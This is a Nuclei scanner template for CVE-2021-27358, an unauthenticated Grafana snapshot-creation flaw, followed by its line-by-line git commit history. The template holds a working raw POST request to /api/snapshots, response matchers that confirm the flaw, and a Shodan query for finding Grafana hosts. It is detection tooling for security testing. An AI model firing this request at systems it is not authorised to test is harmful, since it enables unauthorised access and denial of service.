nuclei-templates/http/cves/2021/CVE-2021-27358.yaml

id: CVE-2021-27358

info:
  name: Grafana Unauthenticated Snapshot Creation
  author: pdteam,bing0o
  severity: high
  description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
  impact: |
    An attacker can create snapshots of sensitive data without authentication, potentially leading to unauthorized access and data exposure.
  remediation: |
    Upgrade to the latest version of Grafana that includes a fix for CVE-2021-27358 or apply the provided patch to mitigate the vulnerability.
  reference:
    - https://phabricator.wikimedia.org/T274736
    - https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27358
    - https://github.com/grafana/grafana/blob/master/CHANGELOG.md
    - https://github.com/grafana/grafana/blob/master/CHANGELOG.md#742-2021-02-17
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2021-27358
    cwe-id: CWE-306
    epss-score: 0.02415
    epss-percentile: 0.89689
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: grafana
    product: grafana
    shodan-query: title:"Grafana"
  tags: cve2021,cve,grafana,unauth

http:
  - raw:
      - |
        POST /api/snapshots HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"deleteUrl":'
          - '"deleteKey":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
# digest: 4b0a00483046022100a246c958300ef66facdc279038dc6c006e6f25ee083e21d2b61f2c05f97608bf0221008541a137b7ea439c0235149d62f678ad167cb4386a17f4d1a8f94bc9ca3ff0a3:922c64590222798bb761d5b6d8e72950
Added Grafana unauthenticated snapshot creation 2021-12-24 12:17:55 +00:00			`id: CVE-2021-27358`

			`info:`
Dashboard Enhancements (#3722) * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Enhancement: cves/2010/CVE-2010-1957.yaml by mp * Enhancement: cves/2010/CVE-2010-1977.yaml by mp * Enhancement: cves/2010/CVE-2010-1979.yaml by mp * Enhancement: cves/2010/CVE-2010-1980.yaml by mp * Enhancement: cves/2010/CVE-2010-1981.yaml by mp * Enhancement: cves/2010/CVE-2010-1982.yaml by mp * Enhancement: cves/2010/CVE-2010-1983.yaml by mp * Enhancement: cves/2010/CVE-2010-2033.yaml by mp * Enhancement: cves/2010/CVE-2010-2034.yaml by mp * Enhancement: cves/2010/CVE-2010-2035.yaml by mp * Enhancement: cves/2010/CVE-2010-2036.yaml by mp * Enhancement: cves/2010/CVE-2010-2037.yaml by mp * Enhancement: cves/2010/CVE-2010-2045.yaml by mp * Enhancement: cves/2010/CVE-2010-2050.yaml by mp * Enhancement: cves/2010/CVE-2010-2122.yaml by mp * Enhancement: cves/2010/CVE-2010-1980.yaml by mp * Enhancement: cves/2010/CVE-2010-1981.yaml by mp * Enhancement: cves/2010/CVE-2010-1982.yaml by mp * Enhancement: cves/2010/CVE-2010-2035.yaml by mp * Enhancement: cves/2010/CVE-2010-2128.yaml by mp * Enhancement: cves/2010/CVE-2010-2259.yaml by mp * Enhancement: cves/2010/CVE-2010-2307.yaml by mp * Enhancement: cves/2010/CVE-2010-2507.yaml by mp * Enhancement: cves/2010/CVE-2010-2680.yaml by mp * Enhancement: cves/2010/CVE-2010-2682.yaml by mp * Enhancement: cves/2010/CVE-2010-2857.yaml by mp * Enhancement: cves/2010/CVE-2010-2861.yaml by mp * Enhancement: cves/2010/CVE-2010-2918.yaml by mp * Enhancement: cves/2010/CVE-2010-2920.yaml by mp * Enhancement: cves/2010/CVE-2010-3203.yaml by mp * Enhancement: cves/2010/CVE-2010-3426.yaml by mp * Enhancement: cves/2010/CVE-2010-4617.yaml by mp * Enhancement: cves/2010/CVE-2010-4231.yaml by mp * Enhancement: cves/2010/CVE-2010-4282.yaml by mp * Enhancement: cves/2010/CVE-2010-4282.yaml by mp * Enhancement: cves/2010/CVE-2010-4617.yaml by mp * Enhancement: cves/2010/CVE-2010-4719.yaml by mp * Enhancement: cves/2010/CVE-2010-4769.yaml by mp * Enhancement: cves/2010/CVE-2010-4977.yaml by mp * Enhancement: cves/2010/CVE-2010-5028.yaml by mp * Enhancement: cves/2010/CVE-2010-5278.yaml by mp * Enhancement: cves/2010/CVE-2010-5286.yaml by mp * Enhancement: cves/2011/CVE-2011-0049.yaml by mp * Enhancement: cves/2011/CVE-2011-1669.yaml by mp * Enhancement: cves/2011/CVE-2011-2744.yaml by mp * Enhancement: cves/2000/CVE-2000-0114.yaml by mp * Enhancement: cves/2011/CVE-2011-3315.yaml by mp * Enhancement: cves/2011/CVE-2011-4336.yaml by mp * Enhancement: cves/2011/CVE-2011-4618.yaml by mp * Enhancement: cves/2011/CVE-2011-4624.yaml by mp * Enhancement: cves/2011/CVE-2011-4804.yaml by mp * Enhancement: cves/2011/CVE-2011-0049.yaml by mp * Enhancement: cves/2011/CVE-2011-2780.yaml by mp * Enhancement: cves/2011/CVE-2011-2780.yaml by mp * Enhancement: cves/2012/CVE-2012-1823.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp * Enhancement: cves/2012/CVE-2012-1226.yaml by mp * Enhancement: cves/2012/CVE-2012-0996.yaml by mp * Enhancement: cves/2021/CVE-2021-39226.yaml by cs * Enhancement: cves/2021/CVE-2021-27358.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2021/CVE-2021-43798.yaml by cs * Enhancement: cves/2012/CVE-2012-1835.yaml by mp * Enhancement: cves/2012/CVE-2012-0901.yaml by mp * Enhancement: cves/2011/CVE-2011-5265.yaml by mp * Enhancement: cves/2011/CVE-2011-5181.yaml by mp * Enhancement: cves/2011/CVE-2011-5179.yaml by mp * Enhancement: cves/2011/CVE-2011-5107.yaml by mp * Enhancement: cves/2011/CVE-2011-5106.yaml by mp * Enhancement: cves/2011/CVE-2011-4926.yaml by mp * Enhancement: cves/2012/CVE-2012-0991.yaml by mp * Enhancement: cves/2012/CVE-2012-0981.yaml by mp * Enhancement: cves/2012/CVE-2012-0896.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp * Enhancement: cves/2012/CVE-2012-0392.yaml by mp Fix "too few spaces before comment" lint errors Co-authored-by: sullo <sullo@cirt.net> 2022-02-21 18:33:16 +00:00			`name: Grafana Unauthenticated Snapshot Creation`
Removed duplicate CVE template 2022-05-07 05:31:47 +00:00			`author: pdteam,bing0o`
Added Grafana unauthenticated snapshot creation 2021-12-24 12:17:55 +00:00			`severity: high`
Dashboard Content Enhancements (#4157) * Enhancement: exposures/files/joomla-file-listing.yaml by cs * Enhancement: cves/2019/CVE-2019-5418.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2021/CVE-2021-20091.yaml by mp * Enhancement: cves/2021/CVE-2021-20092.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: vulnerabilities/other/solar-log-authbypass.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: cves/2017/CVE-2017-9833.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: misconfiguration/symfony-debugmode.yaml by mp * Enhancement: cves/2016/CVE-2016-10940.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: cves/2016/CVE-2016-10960.yaml by mp * Enhancement: cves/2015/CVE-2015-4694.yaml by mp * Enhancement: vulnerabilities/wordpress/churchope-lfi.yaml by mp * Enhancement: cves/2017/CVE-2017-10075.yaml by mp * Enhancement: cves/2021/CVE-2021-27358.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-spot-premium-lfi.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/my-chatbot-xss.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-adaptive-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: cves/2021/CVE-2021-31682.yaml by mp * Enhancement: vulnerabilities/wordpress/wp-woocommerce-file-download.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: vulnerabilities/wordpress/newsletter-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/pieregister-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-25055.yaml by mp * Enhancement: cves/2021/CVE-2021-25028.yaml by mp * Enhancement: vulnerabilities/wordpress/noptin-open-redirect.yaml by mp * Enhancement: vulnerabilities/wordpress/elex-woocommerce-xss.yaml by mp * Enhancement: cves/2021/CVE-2021-24947.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2016/CVE-2016-10033.yaml by mp * Enhancement: vulnerabilities/wordpress/elementorpage-open-redirect.yaml by mp * Enhancement: cves/2021/CVE-2021-24406.yaml by mp * Relocating to CVE folder * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-2628.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2019/CVE-2019-2588.yaml by mp * Enhancement: cves/2021/CVE-2021-31755.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Enhancement: misconfiguration/zabbix-dashboards-access.yaml by mp * Enhancement: cves/2017/CVE-2017-14651.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml by mp * Enhancement: cves/2019/CVE-2019-2729.yaml by mp * Enhancement: cves/2018/CVE-2018-2893.yaml by mp * Enhancement: cves/2018/CVE-2018-3238.yaml by mp * Enhancement: cves/2017/CVE-2017-3528.yaml by mp * Enhancement: cves/2021/CVE-2021-42071.yaml by mp * Syntax corrections Added some cve-id fields Removed duplicate dashboard comments * Tag typo Co-authored-by: sullo <sullo@cirt.net> 2022-04-15 16:39:44 +00:00			`description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`An attacker can create snapshots of sensitive data without authentication, potentially leading to unauthorized access and data exposure.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Upgrade to the latest version of Grafana that includes a fix for CVE-2021-27358 or apply the provided patch to mitigate the vulnerability.`
Added Grafana unauthenticated snapshot creation 2021-12-24 12:17:55 +00:00			`reference:`
Update CVE-2021-27358.yaml 2021-12-24 13:32:18 +00:00			`- https://phabricator.wikimedia.org/T274736`
Added Grafana unauthenticated snapshot creation 2021-12-24 12:17:55 +00:00			`- https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-27358`
Added CPE and EPSS Score to CVE Templates 2023-04-12 10:55:48 +00:00			`- https://github.com/grafana/grafana/blob/master/CHANGELOG.md`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- https://github.com/grafana/grafana/blob/master/CHANGELOG.md#742-2021-02-17`
Auto Generated CVE annotations [Fri Dec 24 13:38:52 UTC 2021] :robot: 2021-12-24 13:38:52 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 7.5`
Auto Generated CVE annotations [Fri Dec 24 13:38:52 UTC 2021] :robot: 2021-12-24 13:38:52 +00:00			`cve-id: CVE-2021-27358`
misc updates 2022-05-07 05:27:44 +00:00			`cwe-id: CWE-306`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`epss-score: 0.02415`
			`epss-percentile: 0.89689`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:grafana:grafana::::::::`
Update CVE-2021-27358.yaml 2022-07-07 10:16:10 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: grafana`
			`product: grafana`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`shodan-query: title:"Grafana"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2021,cve,grafana,unauth`
Added Grafana unauthenticated snapshot creation 2021-12-24 12:17:55 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added Grafana unauthenticated snapshot creation 2021-12-24 12:17:55 +00:00			`- raw:`
			`- \|`
			`POST /api/snapshots HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}`

Update CVE-2021-27358.yaml 2021-12-24 13:32:18 +00:00			`matchers-condition: and`
Added Grafana unauthenticated snapshot creation 2021-12-24 12:17:55 +00:00			`matchers:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- type: word`
			`part: body`
Added Grafana unauthenticated snapshot creation 2021-12-24 12:17:55 +00:00			`words:`
Update CVE-2021-27358.yaml 2021-12-24 13:32:18 +00:00			`- '"deleteUrl":'`
			`- '"deleteKey":'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- "application/json"`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 4b0a00483046022100a246c958300ef66facdc279038dc6c006e6f25ee083e21d2b61f2c05f97608bf0221008541a137b7ea439c0235149d62f678ad167cb4386a17f4d1a8f94bc9ca3ff0a3:922c64590222798bb761d5b6d8e72950`